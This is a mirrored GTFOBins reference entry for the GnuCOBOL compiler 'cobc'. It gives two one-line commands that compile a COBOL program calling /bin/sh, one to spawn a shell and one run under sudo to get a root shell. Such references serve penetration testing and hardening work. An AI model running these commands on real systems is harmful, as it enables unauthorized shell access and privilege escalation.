1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 08:16:02 +02:00
GTFOBins.github.io/_gtfobins/cobc.md
2020-03-14 11:53:05 +01:00

319 B

functions
shell sudo
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x cobc -xFj --frelax-syntax-checks $TF/x
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x sudo cobc -xFj --frelax-syntax-checks $TF/x